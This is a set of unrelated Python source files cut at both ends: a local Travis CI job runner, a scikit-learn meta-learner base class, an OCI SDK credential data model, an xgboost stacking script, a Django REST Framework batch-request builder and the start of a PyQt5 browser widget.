    with end == -1).  Every bound is shifted by *offset*; ends are exclusive.
    """
    result = []

    def shifted(value):
        # adjust for the user-visible offset; negative results are invalid
        adjusted = int(value) + offset
        if adjusted < 0:
            raise ValueError("%s is not in supported range" % str(value))
        return adjusted

    for arg in args:
        if '-' not in arg:
            # single index -> one-element half-open range
            idx = shifted(arg)
            result.append((idx, idx + 1))
            continue
        lo, hi = arg.split('-', 2)
        if lo == '' and not result:
            start = 0  # "-X": open start, only valid as the first range
        else:
            start = shifted(lo)
        if hi == '':
            # "X-": open end sentinel; nothing after it is parsed
            result.append((start, -1))
            break
        result.append((start, shifted(hi) + 1))
    return result
def apply_ranges(ranges, num):
    """Yield every index selected by *ranges*; an end of -1 means "up to num"."""
    for start, end in ranges:
        stop = num if end == -1 else end
        for index in range(start, stop):
            yield index
def read_yaml(p):
    """Parse the YAML file at path *p* and return the resulting object."""
    with open(p) as f:
        return yaml.safe_load(f)
# read global and job-specific envs from the travis config's 'env' section
def read_env(env):
    """Split a travis 'env' section into (global env string, matrix list).

    A plain list is an env matrix with no globals; a dict must have a
    'matrix' key and may have a 'global' list that is joined with spaces.
    """
    if not isinstance(env, dict):
        return '', env
    globals_part = ' '.join(env['global']) if 'global' in env else ''
    return globals_part, env['matrix']
def read_allow_failures(config):
    """Return the env strings listed under matrix.allow_failures, or [] if absent.

    The config may lack 'matrix' entirely or have a non-dict value there, so
    both KeyError and TypeError count as "not configured".
    """
    try:
        af = config['matrix']['allow_failures']
    except (KeyError, TypeError):
        # narrowed from a bare `except:`, which also swallowed
        # SystemExit/KeyboardInterrupt
        return list()
    return list(x['env'] for x in af)
def read_num_include(config):
    """Return the number of matrix.include jobs in the config, or 0 if absent.

    Missing keys or a non-dict 'matrix' both mean "no include section".
    """
    try:
        return len(config['matrix']['include'])
    except (KeyError, TypeError):
        # narrowed from a bare `except:`, which also swallowed
        # SystemExit/KeyboardInterrupt
        return 0
def parse_extra_args(args):
    """Split *args* at the first '--' into (own args, extra env args)."""
    if '--' not in args:
        return args, []
    split_at = args.index('--')
    return args[:split_at], args[split_at + 1:]
# matches an explicit shell-style assignment prefix, e.g. "NAME="
env_assigment = re.compile(r"[a-zA-Z_][a-zA-Z0-9_]*=")


def gen_env(e):
    """Return *e* unchanged if it is already NAME=VALUE; otherwise expand
    NAME from the current process environment (empty string if unset)."""
    return e if env_assigment.match(e) else '%s=%s' % (e, os.getenv(e, ''))
# from https://github.com/travis-ci/travis-build/blob/73bf69a439bb546520a5e5b6b6847fb5424a7c9f/lib/travis/build/env/var.rb#L5
travis_env = re.compile(r"([\w]+)=((?:[^\"'`\ ]?(\"|'|`).*?((?<!\\)\3))+|(?:[^\$]?\$\(.*?\))+|[^\"'\ ]+|(?=\s)|\Z)")


def filter_env(e):
    """Keep only the substrings of *e* that travis would accept as env assignments."""
    assignments = [m.group(0) for m in travis_env.finditer(e)]
    return ' '.join(assignments)
def highlight_diff(e, n=''):
    """Render *e* with the characters that filter_env would strip highlighted.

    Diffs *e* against its filtered form and wraps every dropped non-blank
    chunk in a red-background ANSI escape; *n* is the SGR code to switch
    back to afterwards (e.g. 44 for a blue background).
    """
    filtered = filter_env(e)
    rendered = []
    for entry in difflib.ndiff(e, filtered, None, None):
        tag, chunk = entry[0:2], entry[2:]
        if tag == " " or not chunk.strip(' '):
            # unchanged (or whitespace-only) characters pass through untouched
            rendered.append(chunk)
        else:
            rendered.append("\033[1;41m%s\033[1;%sm" % (chunk, str(n)))
    return ''.join(rendered)
def print_help(cmd):
    """Print usage instructions for *cmd* to stdout.

    Fixes the typo "wih" -> "with" in the examples heading.
    """
    print("""
Usage: %s [PATH] [RANGE*] [-- [ENV[=VALUE]*]]
Parses the travis config in the given path or in the current working directory and runs all specified tests sequentially
If no range is given, the list of jobs will get printed.
The number of tests can be reduced by specifying one or more ranges:
* single job: 1 (only first)
* range: 2-3 (only second and third)
* open start, only as first range: -4 (jobs 1 to 4)
* open end, only as last range: 7- (job 7 and all following jobs)
* open range: - (all jobs)
Complex examples for a matrix with 12 jobs:
* -4 7 8: runs jobs 1 2 3 4 7 8
* 1 7-9: runs jobs 1 7 8 9
* 1 7-9 11-: runs jobs 1 7 8 9 11 12
* -: runs all jobs
The jobs will be run in clean environments.
Only DOCKER_PORT, SSH_AUTH_SOCK, and TERM will be kept.
Additional variable names can be passed at the end.
""" % cmd)
def main(scripts_dir, argv):
    """Parse the travis config, then either list the jobs (when no ranges are
    given) or run the selected jobs sequentially in cleaned environments.

    scripts_dir: directory containing the companion "run_ci" script.
    argv: full process argv (argv[0] is the command name).
    Exits via sys.exit on --help, after listing, or when a non-allow_failures
    job fails.
    """
    if '--help' in argv:
        print_help(argv[0])
        sys.exit(0)
    args, extra_env = parse_extra_args(argv[1:])
    path, args = find_config_file(args, ['.travis.yml', '.travis.yaml'])
    config = read_yaml(path)
    global_env, job_envs = read_env(config['env'])
    allow_failures = read_allow_failures(config)
    # job ordering: regular jobs first, then one None placeholder per
    # (unsupported) 'include' entry, then the allow_failures jobs last
    job_envs = [ x for x in job_envs if x not in allow_failures ] \
        + [None] * read_num_include(config) \
        + [ x for x in job_envs if x in allow_failures ]
    if len(args) == 0:
        # no ranges given: print the job list and exit
        if(len(global_env) > 0):
            print('Globals: %s' % str(highlight_diff(global_env)))
        jobs = len(job_envs)
        digits = len(str(jobs))  # right-align job numbers
        for i in range(jobs):
            print('Job %s%s: %s' % ( str(i+1).rjust(digits),
                ' (allow_failures)' if job_envs[i] in allow_failures else '',
                highlight_diff(job_envs[i]) if job_envs[i] is not None else "<unsupported job from 'include' section>"))
        print("run all with %s -" % sys.argv[0])
        sys.exit(0)
    # CLI job numbers are 1-based; shift to 0-based indices
    ranges = parse_ranges(args, -1)
    run_ci = [os.path.join(scripts_dir, "run_ci"), os.path.dirname(path), filter_env(global_env)]
    # parallel command with ANSI highlighting, used only for display
    run_ci_diff = [os.path.join(scripts_dir, "run_ci"), os.path.dirname(path), highlight_diff(global_env, 44)]
    # run each job through "env -i" so only the whitelisted (plus extra_env)
    # variables survive into the job's shell
    bash = ['env', '-i'] +list(map(gen_env, ['DOCKER_PORT', 'HOME', 'PATH', 'SSH_AUTH_SOCK', 'TERM'])) + ['bash','-e']
    selection = set(apply_ranges(ranges, len(job_envs)))
    for i in selection:
        if job_envs[i] is None:
            print("\033[1;43mSkipped job %d, because jobs from 'include' section are not supported\033[1;m" %(i+1,))
            continue
        cmd = ' '.join(run_ci + [filter_env(job_envs[i])] + list(map(gen_env, extra_env)))
        cmd_diff = ' '.join(run_ci_diff + [highlight_diff(job_envs[i], 44)] + list(map(gen_env, extra_env)))
        print('\033[1;44mRunning job %d%s: %s\033[1;m' %(i+1, ' (allow_failures)' if job_envs[i] in allow_failures else '', cmd_diff))
        # feed the command to bash over stdin inside the stripped environment
        proc = subprocess.Popen(bash, stdin=subprocess.PIPE)
        proc.communicate(cmd.encode())
        if proc.returncode:
            print('\033[1;41mFailed job %d: %s\033[1;m' %(i+1, cmd))
            if job_envs[i] not in allow_failures:
                # allow_failures jobs may fail without aborting the run
                sys.exit(proc.returncode)
|
from abc import ABCMeta, abstractmethod
import numpy as np
from sklearn.base import (MetaEstimatorMixin,
is_classifier,
clone,)
from sklearn.utils import check_scalar
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.utils.validation import check_is_fitted
from ..base import BaseEstimator
class BaseLearner(BaseEstimator,
                  MetaEstimatorMixin,
                  metaclass=ABCMeta):
    """Abstract base for per-treatment-group meta-estimators.

    Clones ``estimator`` into one sub-estimator per name in
    ``estimators_params`` and fits each one on the control group plus a single
    treatment group; optionally fits calibrated propensity models as well.

    NOTE(review): "propencity" is a misspelling of "propensity" but is part of
    the public parameter names, so it is kept for backward compatibility.
    NOTE(review): ``self.groups`` / ``self.n_groups`` are read in this class
    but never assigned here — presumably set by ``_validate_data`` or a
    subclass; confirm before relying on them.
    """

    def __init__(self,
                 estimator,
                 *,
                 estimators_params: list,
                 propencity: bool = False,
                 propencity_score=None,
                 propencity_estimator=None,
                 random_state: int = None):
        # sklearn convention: __init__ only stores parameters verbatim;
        # validation happens in _check_params / fit
        self.estimator = estimator
        self.estimators_params = estimators_params
        self.propencity = propencity
        self.propencity_score = propencity_score
        self.propencity_estimator = propencity_estimator
        self.random_state = random_state

    def _make_estimators(self):
        """Clone the template estimator into one attribute per estimators_params name."""
        if self.estimator is not None:
            for e in self.estimators_params:
                setattr(self, e, clone(self.estimator))
            if len(self.estimators_params) != 0:
                # template consumed: clear it so subsequent fits reuse the clones
                self.estimator = None
        else:
            # no template provided: treat the (pre-set) ``estimator`` attribute
            # itself as the single sub-estimator
            self.estimators_params = ('estimator',)

    @abstractmethod
    def _check_params(self):
        """Validate sub-estimators and propensity settings; return shared fit kwargs."""
        params = dict()
        for e in self.estimators_params:
            if getattr(self, e) is None:
                raise ValueError(f'Estimator {e} is None')
            # each sub-estimator must match this meta-estimator's task type
            if is_classifier(self) != is_classifier(getattr(self, e)):
                raise ValueError(f'Estimator {e} must be '
                                 + ('classifier' if is_classifier(self) else 'regressor'))
        if self.propencity:
            if self.propencity_score is None:
                # scores will be estimated: a classifier is required
                if self.propencity_estimator is None:
                    raise ValueError('Estimator for propencity is None')
                if not is_classifier(self.propencity_estimator):
                    raise ValueError('Estimator for propencity must be classifier')
            else:
                # fixed scores supplied: one probability per group,
                # each strictly inside (0, 1)
                if not isinstance(self.propencity_score, list):
                    self.propencity_score = [self.propencity_score]
                if len(self.propencity_score) != self.n_groups:
                    raise ValueError('Propencity vector must have same lenght as groups')
                for score in self.propencity_score:
                    check_scalar(score,
                                 'propencity_score', float,
                                 min_val=0, max_val=1,
                                 include_boundaries='neither')
        return params

    def fit(self, X, y, w, **fit_params):
        """Fit one sub-estimator set per treatment group.

        X, y: features and targets.  w: group labels where 0 marks the control
        group and 1..n_groups mark treatment groups.  fit_params are forwarded
        to the group fits; a 'propencity_estimator' entry (a dict) is passed to
        the propensity fit instead.
        """
        X, y, w = self._validate_data(X, y, w,
                                      reset=True,
                                      force_all_finite=self._get_tags()['allow_nan'])
        self._make_estimators()
        params = self._check_params()
        params['fit_params'] = fit_params
        self.estimators = [tuple() for i in range(self.n_groups)]
        if self.propencity_estimator is not None:
            self.p_estimators = [tuple() for i in range(self.n_groups)]
        for group in self.groups:
            # restrict to control (w == 0) plus the current treatment group,
            # then binarize the group indicator
            Xg = X[(w == group) | (w == 0)]
            yg = y[(w == group) | (w == 0)]
            wg = w[(w == group) | (w == 0)]
            wg[wg == group] = 1
            if self.propencity_estimator is not None:
                self._fit_propencity(group, Xg, wg,
                                     **fit_params.get('propencity_estimator', {}))
            self._fit_group(group,
                            Xg, yg, wg,
                            **params)
        return self

    @abstractmethod
    def _fit_group(self, group, X, y, w, **kwargs):
        """Fit the sub-estimator(s) for one treatment group (subclass hook)."""
        pass

    def _fit_propencity(self, group, X, w, **fit_params):
        """Fit and calibrate a propensity classifier for one treatment group."""
        # half the data trains the raw classifier, the other half calibrates it
        (X, X_calib,
         w, w_calib,) = train_test_split(X, w,
                                         test_size=0.5,
                                         stratify=w,
                                         random_state=self.random_state)
        estimator = clone(self.propencity_estimator)
        estimator.fit(X, w, **fit_params)
        # calibrate with a logistic regression on the predicted P(w == 1)
        estimator_calib = LogisticRegression(random_state=self.random_state)
        estimator_calib.fit(estimator.predict_proba(X_calib)[:, 1].reshape(-1, 1),
                            w_calib)
        self.p_estimators[group - 1] = (estimator, estimator_calib)

    def predict(self, X, **kwargs):
        """Return an (n_samples, n_groups) prediction matrix; 1-D for a single group."""
        check_is_fitted(self)
        self._validate_data(X, reset=False,
                            force_all_finite=self._get_tags()['allow_nan'])
        n_samples, _ = X.shape
        preds = np.full((n_samples, self.n_groups), np.nan)
        for group in self.groups:
            preds[:, group - 1] = self._predict_group(group, X, **kwargs)
        if self.n_groups == 1:
            return preds.reshape(-1)
        return preds

    @abstractmethod
    def _predict_group(self, group, X, **kwargs):
        """Predict for one treatment group (subclass hook)."""
        pass

    def _predict_propencity(self, group, X, **kwargs):
        """Return calibrated (or fixed) propensity scores for one group."""
        if self.propencity:
            if self.propencity_score is None:
                estimator, estimator_calib = self.p_estimators[group - 1]
                pred = estimator.predict_proba(X)[:, 1].reshape(-1, 1)
                return estimator_calib.predict_proba(pred)[:, 1]
            else:
                # constant user-supplied score for every sample
                return np.full(X.shape[0], self.propencity_score[group - 1])
        else:
            raise ValueError('Propencity is not supported')
|
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
@init_model_state_from_kwargs
class CredentialAuthenticatorInfo(object):
    """
    CredentialAuthenticatorInfo model.

    All attributes are simple pass-through values stored in underscore-prefixed
    backing fields; the properties below are built once, at class-definition
    time, by the ``_prop`` factory.
    """

    def _prop(name, description):
        # class-construction helper (no self): build a property that reads and
        # writes the '_<name>' backing field, with standard OCI-style docs
        key = '_' + name

        def _get(self):
            return getattr(self, key)

        def _set(self, value):
            setattr(self, key, value)

        doc = """
        **[Required]** Gets or sets the %s of this CredentialAuthenticatorInfo.
        %s
        """ % (name, description)
        return property(_get, _set, doc=doc)

    raw_credential = _prop('raw_credential', 'The raw credential.')
    user_id = _prop('user_id', 'The id of the user.')
    tenant_id = _prop('tenant_id', 'The id of the tenant.')
    user_name = _prop('user_name', 'The name of the user.')
    tenant_name = _prop('tenant_name', 'The name of the tenant.')
    credential_identifier = _prop('credential_identifier', 'The credential identifier.')
    credential_list = _prop('credential_list', 'The credential list.')
    service = _prop('service', 'The name of the service that is making this authorization request.')
    client_id = _prop('client_id', 'The id of the client.')

    del _prop  # definition-time helper only; not part of the model API

    def __init__(self, **kwargs):
        """
        Initializes a new CredentialAuthenticatorInfo object with values from
        keyword arguments.  The supported keyword arguments correspond to the
        properties of this class: raw_credential (str), user_id (str),
        tenant_id (str), user_name (str), tenant_name (str),
        credential_identifier (str), credential_list (list[str]),
        service (str) and client_id (str).
        """
        # swagger_types / attribute_map drive (de)serialization in the SDK
        self.swagger_types = {
            'raw_credential': 'str',
            'user_id': 'str',
            'tenant_id': 'str',
            'user_name': 'str',
            'tenant_name': 'str',
            'credential_identifier': 'str',
            'credential_list': 'list[str]',
            'service': 'str',
            'client_id': 'str'
        }

        self.attribute_map = {
            'raw_credential': 'rawCredential',
            'user_id': 'userId',
            'tenant_id': 'tenantId',
            'user_name': 'userName',
            'tenant_name': 'tenantName',
            'credential_identifier': 'credentialIdentifier',
            'credential_list': 'credentialList',
            'service': 'service',
            'client_id': 'clientId'
        }

        # every backing field starts at None; the decorator applies kwargs
        for attribute in self.swagger_types:
            setattr(self, '_' + attribute, None)

    def __repr__(self):
        return formatted_flat_dict(self)

    def __eq__(self, other):
        if other is None:
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self == other
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 11 00:20:32 2015
@author: konrad
"""
import numpy as np
import pandas as pd
import datetime
import xgboost as xgb
if __name__ == '__main__':
    ## settings
    projPath = './'
    dataset_version = "kb8"
    model_type = "xgb"
    seed_value = 260
    todate = datetime.datetime.now().strftime("%Y%m%d")

    ## data
    # read the training and test sets
    xtrain = pd.read_csv(projPath + 'input/xtrain_' + dataset_version + '.csv')
    id_train = xtrain.QuoteNumber
    ytrain = xtrain.QuoteConversion_Flag
    xtrain.drop('QuoteNumber', axis=1, inplace=True)
    xtrain.drop('QuoteConversion_Flag', axis=1, inplace=True)

    xtest = pd.read_csv(projPath + 'input/xtest_' + dataset_version + '.csv')
    id_test = xtest.QuoteNumber
    xtest.drop('QuoteNumber', axis=1, inplace=True)

    # folds
    xfolds = pd.read_csv(projPath + 'input/xfolds.csv')
    # work with 5-fold split
    fold_index = xfolds.fold5
    fold_index = np.array(fold_index) - 1
    n_folds = len(np.unique(fold_index))

    ## model
    # parameter grid: each tuple follows this index convention
    #   0: min_child_weight
    #   1: max_depth
    #   2: colsample_bytree
    #   3: subsample
    #   4: gamma
    #   5: learning rate (eta)
    #   6: n_estimators (ntrees)
    param_grid = [
        (1, 6, 0.73, 0.756, 0.00001, 0.017, 2400),
        (1, 8, 0.789, 0.97, 0, 0.018, 1100),
        (1, 7, 0.85, 0.85, 0.00008, 0.023, 488),
        (1, 6, 0.89, 0.994, 0.0001, 0.02421, 700),
        (1, 10, 0.74, 0.908, 0.0005, 0.0141, 1750),
        (1, 15, 0.7890, 0.890643, 0.231, 0.21, 900),
        (1, 19, 0.78, 0.97453, 0.00009, 0.01, 3900),
        (1, 6, 0.77, 0.83, 0, 0.023, 1800),
        (1, 8, 0.77, 0.83, 0.001, 0.03, 900),
        (1, 7, 0.84, 0.91, 0.00008, 0.021, 3000)
    ]

    # storage for out-of-fold (validation) and full-train forecasts
    mvalid = np.zeros((xtrain.shape[0], len(param_grid)))
    mfull = np.zeros((xtest.shape[0], len(param_grid)))

    ## build 2nd level forecasts
    for i in range(len(param_grid)):
        print("processing parameter combo:", param_grid[i])
        # configure model with i-th combo of parameters
        x = param_grid[i]
        # BUG FIX: gamma was previously wired to x[2] (the colsample_bytree
        # slot); per the index convention above it must be x[4].
        clf = xgb.XGBClassifier(n_estimators=x[6],
                                nthread=-1,
                                max_depth=x[1],
                                min_child_weight=x[0],
                                learning_rate=x[5],
                                silent=True,
                                subsample=x[3],
                                colsample_bytree=x[2],
                                gamma=x[4],
                                seed=seed_value)

        # loop over folds - keeping as pandas for ease of use with xgb wrapper
        for j in range(1, n_folds + 1):
            idx0 = xfolds[xfolds.fold5 != j].index
            idx1 = xfolds[xfolds.fold5 == j].index
            x0 = xtrain[xtrain.index.isin(idx0)]
            x1 = xtrain[xtrain.index.isin(idx1)]
            y0 = ytrain[ytrain.index.isin(idx0)]
            y1 = ytrain[ytrain.index.isin(idx1)]
            # fit on the training folds, predict the held-out fold
            clf.fit(x0, y0, eval_metric="auc", eval_set=[(x1, y1)])
            mvalid[idx1, i] = clf.predict_proba(x1)[:, 1]

        # fit on complete dataset (same fixed gamma index as above)
        bst = xgb.XGBClassifier(n_estimators=x[6],
                                nthread=-1,
                                max_depth=x[1],
                                min_child_weight=x[0],
                                learning_rate=x[5],
                                silent=True,
                                subsample=x[3],
                                colsample_bytree=x[2],
                                gamma=x[4],
                                seed=seed_value)
        bst.fit(xtrain, ytrain, eval_metric="auc")
        mfull[:, i] = bst.predict_proba(xtest)[:, 1]

    ## store the results
    # add indices etc
    mvalid = pd.DataFrame(mvalid)
    mvalid.columns = [model_type + str(i) for i in range(0, mvalid.shape[1])]
    mvalid['QuoteNumber'] = id_train
    mvalid['QuoteConversion_Flag'] = ytrain

    mfull = pd.DataFrame(mfull)
    mfull.columns = [model_type + str(i) for i in range(0, mfull.shape[1])]
    mfull['QuoteNumber'] = id_test

    # save the files
    mvalid.to_csv(projPath + 'metafeatures/prval_' + model_type + '_' + todate + '_data' + dataset_version + '_seed' + str(seed_value) + '.csv', index=False, header=True)
    mfull.to_csv(projPath + 'metafeatures/prfull_' + model_type + '_' + todate + '_data' + dataset_version + '_seed' + str(seed_value) + '.csv', index=False, header=True)
<filename>drf_batch_requests/request.py
import json
import re
from io import BytesIO
from urllib.parse import urlsplit
from django.http import HttpRequest
from django.http.request import QueryDict
from django.utils.encoding import force_text
from rest_framework.exceptions import ValidationError
from drf_batch_requests.exceptions import RequestAttributeError
from drf_batch_requests.serializers import BatchRequestSerializer
from drf_batch_requests.utils import get_attribute
class BatchRequest(HttpRequest):
    """A synthetic Django request representing one sub-request of a batch.

    Built from the parent (batch) ``request`` and a single validated
    ``request_data`` dict: method, relative URL, headers and body.  Headers
    are inherited from the parent request and may be overridden per
    sub-request.
    """

    # Standard WSGI supported headers
    # (are not prefixed with HTTP_)
    _wsgi_headers = ["content_length", "content_type", "query_string",
                     "remote_addr", "remote_host", "remote_user",
                     "request_method", "server_name", "server_port"]

    def __init__(self, request, request_data):
        super(BatchRequest, self).__init__()

        self.name = request_data.get('name')
        self.omit_response_on_success = request_data.get('omit_response_on_success', False)

        # Body is pre-rendered by BatchRequestsFactory as a string.
        self._stream = BytesIO(request_data['_body'].encode('utf-8'))
        self._read_started = False

        self.method = request_data['method']
        split_url = urlsplit(request_data['relative_url'])
        self.path_info = self.path = split_url.path
        self.GET = QueryDict(split_url.query)
        self._set_headers(request, request_data.get('headers', {}))
        self.COOKIES = request.COOKIES

    def _set_headers(self, request, headers):
        """
        Inherit headers from batch request by default.
        Override with values given in subrequest.
        """
        # BUG FIX: previously this aliased request.META and then mutated it,
        # leaking sub-request headers into the parent request and into every
        # subsequent sub-request. Copy so each BatchRequest owns its META.
        self.META = dict(request.META) if request is not None else {}
        if headers is not None:
            self.META.update(self._transform_headers(headers))

    def _transform_headers(self, headers):
        """
        For every header:
        - replace - to _
        - prepend http_ if necessary
        - convert to uppercase
        """
        result = {}
        for header, value in headers.items():
            header = header.replace("-", "_")
            # Standard WSGI variables keep their bare name; everything else
            # gets the HTTP_ prefix per the WSGI convention.
            header = "http_{header}".format(header=header) \
                if header.lower() not in self._wsgi_headers \
                else header
            result.update({header.upper(): value})

        return result
class BatchRequestsFactory(object):
    """Builds the individual ``BatchRequest`` objects for a batch request.

    Resolves inter-request references of the form
    ``{result=<name>:$.<json.path>}`` against already-executed named
    responses, and re-renders each sub-request body in the parent
    request's content type.
    """

    # Matches {result=<name>:$.<path>}: group "name" is the referenced named
    # request, group "value" is the JSON path into its response.
    response_variable_regex = re.compile(r'({result=(?P<name>[\w\d_]+):\$\.(?P<value>[\w\d_.*]+)})')

    def __init__(self, request):
        self.request = request
        self.request_serializer = BatchRequestSerializer(data=request.data)
        self.request_serializer.is_valid(raise_exception=True)
        self.update_soft_dependencies()
        # name -> response, populated as named sub-requests complete.
        self.named_responses = {}

    def update_soft_dependencies(self):
        """Add implicit dependencies to each sub-request.

        Any ``{result=name:$...}`` reference found in a sub-request's values
        makes that sub-request depend on the named request, in addition to
        any explicit ``depends_on`` entries.
        """
        for request_data in self.request_serializer.validated_data['batch']:
            parents = request_data.get('depends_on', [])
            for part in request_data.values():
                params = re.findall(
                    self.response_variable_regex, force_text(part)
                )
                # param[1] is the "name" group of each match.
                parents.extend(map(lambda param: param[1], params or []))

            request_data['depends_on'] = set(parents)

    def _prepare_formdata_body(self, data, files=None):
        """Render *data* (+ optional *files*) as a multipart/form-data body.

        Reuses the boundary of the parent batch request.
        NOTE(review): file contents are interpolated into a str body —
        presumably only text-safe attachments are expected; verify for
        binary uploads.
        """
        if not data and not files:
            return ''

        match = re.search(r'boundary=(?P<boundary>.+)', self.request.content_type)
        assert match
        boundary = match.groupdict()['boundary']

        body = ''
        for key, value in data.items():
            # Non-string values are serialized as JSON.
            value = value if isinstance(value, str) else json.dumps(value)
            body += '--{}\r\nContent-Disposition: form-data; name="{}"\r\n\r\n{}\r\n'.format(boundary, key, value)

        if files:
            for key, attachment in files.items():
                attachment.seek(0)

                attachment_body_part = '--{0}\r\nContent-Disposition: form-data; name="{1}"; filename="{2}"\r\n' \
                                       'Content-Type: {3}\r\n' \
                                       'Content-Transfer-Encoding: binary\r\n\r\n{4}\r\n'
                body += attachment_body_part.format(
                    boundary, key, attachment.name, attachment.content_type, attachment.read()
                )

        # Closing boundary marker.
        body += '--{}--\r\n'.format(boundary)
        return body

    def _prepare_urlencoded_body(self, data):
        # Not supported yet; batch requests must use multipart or JSON.
        raise NotImplementedError

    def _prepare_json_body(self, data):
        return json.dumps(data)

    def _process_attr(self, attr):
        """Substitute ``{result=name:$.path}`` references inside *attr*.

        Raises ValidationError when the named request has no stored response,
        and RequestAttributeError when the JSON path resolves to nothing.
        """
        params = re.findall(
            self.response_variable_regex, attr
        )
        if not params:
            return attr

        for url_param in params:
            if url_param[1] not in self.named_responses:
                raise ValidationError('Named request {} is missing'.format(url_param[1]))

            result = get_attribute(
                self.named_responses[url_param[1]].data,
                url_param[2].split('.')
            )
            if result is None:
                raise RequestAttributeError('Empty result for {}'.format(url_param[2]))

            if isinstance(result, list):
                result = ','.join(map(str, result))

            # If the attribute is exactly one reference, keep the resolved
            # value's original type; otherwise substitute it as a string.
            if attr == url_param[0]:
                attr = result
            else:
                attr = attr.replace(url_param[0], str(result))

        return attr

    def updated_obj(self, obj):
        """
        For now, i'll update only dict values. Later it can be used for keys/single values/etc
        :param obj: dict
        :return: dict
        """
        if isinstance(obj, dict):
            for key, value in obj.items():
                obj[key] = self.updated_obj(value)
        elif isinstance(obj, str):
            return self._process_attr(obj)

        return obj

    def get_requests_data(self):
        # Validated list of sub-request dicts, in submission order.
        return self.request_serializer.validated_data['batch']

    def generate_request(self, request_data):
        """Resolve references and render the body, then build a BatchRequest."""
        request_data['data'] = self.updated_obj(request_data['data'])
        request_data['relative_url'] = self._process_attr(request_data['relative_url'])

        # Render the sub-request body in the parent request's content type.
        if self.request.content_type.startswith('multipart/form-data'):
            request_data['_body'] = self._prepare_formdata_body(request_data['data'],
                                                                files=request_data.get('files', {}))
        elif self.request.content_type.startswith('application/x-www-form-urlencoded'):
            request_data['_body'] = self._prepare_urlencoded_body(request_data['data'])
        elif self.request.content_type.startswith('application/json'):
            request_data['_body'] = self._prepare_json_body(request_data['data'])
        else:
            raise ValidationError('Unsupported content type')

        return BatchRequest(self.request, request_data)
|
<reponame>sequana/sequanix
from PyQt5 import QtCore, Qt
from PyQt5.QtWidgets import QLineEdit
from PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEnginePage, QWebEngineSettings
# potential resources for improvements:
# https://github.com/ralsina/devicenzo/blob/master/devicenzo.py
class Browser(Qt.QMainWindow):
    """
    On purpose, there is no caching so that (if re-generated), the
    new content of an HTML is shown.
    """

    def __init__(self, url):
        """Build the browser window and load *url*."""
        Qt.QMainWindow.__init__(self)

        # Progress bar
        # ------------------------------------------------------------
        self.progress = 0

        # Main page QWebView
        # -------------------------------------------------------------
        self.wb = SequanixQWebView(parent=self, titleChanged=self.setWindowTitle)
        self.wb.urlChanged.connect(lambda u: self.url.setText(u.toString()))
        self.wb.titleChanged.connect(self.adjustTitle)
        self.wb.loadProgress.connect(self.setProgress)
        self.setCentralWidget(self.wb)

        # Main menu tool bar
        # -------------------------------------------------------------
        self.tb = self.addToolBar("Main Toolbar")
        for a in (
            QWebEnginePage.Back,
            QWebEnginePage.Forward,
            QWebEnginePage.Reload,
            QWebEnginePage.DownloadLinkToDisk,
        ):
            self.tb.addAction(self.wb.pageAction(a))
        self.url = QLineEdit(returnPressed=lambda: self.wb.setUrl(QtCore.QUrl.fromUserInput(self.url.text())))
        self.tb.addWidget(self.url)

        # status bar ---------------------------------------------------
        self.sb = self.statusBar()
        try:
            # pyqt5.6
            self.wb.statusBarMessage.connect(self.sb.showMessage)
        except AttributeError:
            # BUG FIX: was a bare "except:", which also swallowed
            # KeyboardInterrupt/SystemExit; only the missing-signal case
            # (older/newer PyQt builds) should be tolerated here.
            pass
        self.wb.page().linkHovered.connect(lambda l: self.sb.showMessage(l, 3000))

        # Search bar
        # ------------------------------------------------------------
        self.search = QLineEdit(returnPressed=lambda: self.wb.findText(self.search.text()))
        self.search.show()
        self.search.hide()  # To make ctrl+F effective, need to show/hide ?

        # The shortcuts
        # ---------------------------------------------------------
        self.showSearch = Qt.QShortcut("Ctrl+F", self, activated=lambda: (self.search.show(), self.search.setFocus()))
        self.hideSearch = Qt.QShortcut("Esc", self, activated=lambda: (self.search.hide(), self.wb.setFocus()))
        self.quit = Qt.QShortcut("Ctrl+Q", self, activated=self.close)
        self.zoomIn = Qt.QShortcut("Ctrl++", self, activated=lambda: self.wb.setZoomFactor(self.wb.zoomFactor() + 0.2))
        self.zoomOut = Qt.QShortcut("Ctrl+-", self, activated=lambda: self.wb.setZoomFactor(self.wb.zoomFactor() - 0.2))
        self.zoomOne = Qt.QShortcut("Ctrl+=", self, activated=lambda: self.wb.setZoomFactor(1))

        # Add alt+left and right keys to navigate backward and forward
        Qt.QShortcut(QtCore.Qt.AltModifier + QtCore.Qt.Key_Left, self, activated=lambda: self.wb.back())
        Qt.QShortcut(QtCore.Qt.AltModifier + QtCore.Qt.Key_Right, self, activated=lambda: self.wb.forward())

        # Add components on the page
        self.sb.addPermanentWidget(self.search)

        # Finally, load the URL
        self.wb.load(QtCore.QUrl(url))
        try:
            # Disable the object cache entirely (see class docstring); the
            # API does not exist on every Qt WebEngine version.
            self.wb.settings().setObjectCacheCapacities(0, 0, 0)
        except Exception:
            pass

    def adjustTitle(self):
        """Show load progress in the window title while loading."""
        if 0 < self.progress < 100:
            self.setWindowTitle("%s (%s%%)" % (self.wb.title(), self.progress))
        else:
            self.setWindowTitle(self.wb.title())

    def setProgress(self, p):
        """Slot for loadProgress: record *p* (percent) and refresh the title."""
        self.progress = p
        self.adjustTitle()
class SequanixQWebView(QWebEngineView):
    """This is the webview for the application.

    It represents a browser window, either the main one or a popup.
    It's a simple wrapper around QWebView that configures some basic settings.
    """

    def __init__(self, parent=None, **kwargs):
        """Constructor for the class"""
        super().__init__(parent, **kwargs)
        # Kept so popups created in createWindow inherit the same options.
        self.kwargs = kwargs

        # Javascript and other settings
        # ------------------------------------------------------------
        try:
            self.settings().setAttribute(QWebEngineSettings.JavascriptCanOpenWindows, True)
            self.settings().setAttribute(QWebEngineSettings.LocalStorageEnabled, True)
            self.settings().setAttribute(QWebEngineSettings.PluginsEnabled, True)
        except AttributeError:
